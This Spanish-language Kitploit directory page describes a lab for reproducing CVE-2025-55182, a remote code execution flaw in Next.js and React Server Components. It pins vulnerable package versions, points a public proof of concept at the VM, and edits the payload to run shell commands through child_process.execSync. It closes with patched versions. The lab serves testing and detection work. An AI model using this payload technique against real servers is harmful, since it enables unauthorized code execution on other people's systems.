Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-55182-poc-test | Kitploit
Herramientas/GitHubGitHub/jandelima/cve-2025-55182-poc-test
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubjandelima/cve-2025-55182-poc-test

cve-2025-55182-poc-test

Ver Repositorio
hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Laboratorio de demostración CVE-2025-55182 (Next.js / React RSC RCE)

Este documento proporciona una configuración completa y reproducible para demostrar la ejecución remota de código (RCE) de CVE-2025-55182 contra un entorno vulnerable de Next.js + React Server Components que se ejecuta dentro de una máquina virtual Ubuntu con Multipass.

El exploit se ejecuta desde fuera de la VM, lo que demuestra la explotabilidad remota y prepara el entorno para la detección de comportamientos anómalos.

Fuente: https://github.com/ejpir/CVE-2025-55182-research


1. Crear y preparar la VM de Ubuntu

2. Configuración básica dentro de la VM

2.1 Actualizar el sistema e instalar dependencias

root@kitploit:~
sudo apt update && sudo apt upgrade -y
sudo apt install -y curl git build-essential

2.2 Instalar Node.js LTS (20.x)

root@kitploit:~
curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash -
sudo apt install -y nodejs

Verificar:

root@kitploit:~
node -v
npm -v

2.3 Crear un usuario dedicado para la aplicación

root@kitploit:~
sudo adduser reactlab
sudo usermod -aG sudo reactlab
su - reactlab

3. Desplegar la aplicación Next.js vulnerable

3.1 Crear el directorio de trabajo

root@kitploit:~
mkdir ~/react2shell-lab
cd ~/react2shell-lab

3.2 Generar un proyecto básico de Next.js App Router

root@kitploit:~
npx create-next-app@latest vulnerable-app
cd vulnerable-app

3.3 Fijar versiones vulnerables en package.json

Edita las dependencias:

root@kitploit:~
"dependencies": {
  "next": "16.0.0",
  "react": "19.1.0",
  "react-dom": "19.1.0"
}

Reinstala los paquetes:

root@kitploit:~
rm -rf node_modules package-lock.json
npm install

Verifica:

root@kitploit:~
npm list react react-dom next

Resultado esperado:

root@kitploit:~
[email protected]
[email protected]
[email protected]

3.4 Compilar y ejecutar en modo producción

root@kitploit:~
npm run build
npm start

Salida esperada:

root@kitploit:~
▲ Next.js 16.0.0
Local:   http://localhost:3000
Network: http://10.X.X.X:3000

start


4. Confirmar la accesibilidad externa (máquina atacante → VM)

En otra máquina:

root@kitploit:~
curl http://10.102.169.126:3000

Deberías recibir la página HTML predeterminada de Next.js.


5. Clonar y probar el PoC en la máquina atacante

5.1 Clonar el repositorio

root@kitploit:~
cd ~
git clone https://github.com/ejpir/CVE-2025-55182-research
cd CVE-2025-55182-research

5.2 Apuntar el PoC a la IP del servidor

Busca:

root@kitploit:~
hostname: 'localhost',

Reemplázalo con:

root@kitploit:~
hostname: '10.X.X.X',

5.3 Ejecutar el PoC de referencia (RCE simple con console.log)

Con Next aún en ejecución:

root@kitploit:~
node test-simple.cjs

Resultado esperado en la terminal de Next.js:

root@kitploit:~
NON-CHUNKED-RCE

Esto confirma la ejecución remota de código a través de React Flight utilizando las versiones vulnerables.

confirmed


6. Modificar el PoC para realizar un efecto secundario visible (creación de archivos)

El objetivo es generar un comportamiento observable (sistema de archivos + ejecución de procesos).

6.1 Editar _prefix dentro de test-simple.cjs

Localiza:

root@kitploit:~
"_prefix": "console.log('NON-CHUNKED-RCE');//"

Reemplázalo con:

root@kitploit:~
"_prefix": "process.mainModule.require('child_process').execSync('touch /tmp/cve-2025-55182-syscall');console.log('NON-CHUNKED-RCE');//"

Nota: require no está disponible en el contexto de ejecución, pero process.mainModule.require() sí lo está.

6.2 Probar el exploit modificado

Asegúrate de que Next esté en ejecución y luego:

root@kitploit:~
node test-simple.cjs

Comprueba la creación del archivo:

root@kitploit:~
ls -l /tmp/

Deberías ver:

root@kitploit:~
cve-2025-55182-syscall

Esto confirma una RCE funcional con efectos secundarios.

start


Parche:
React ≥ 19.2.1
Next.js ≥ 16.0.7

Descargar herramienta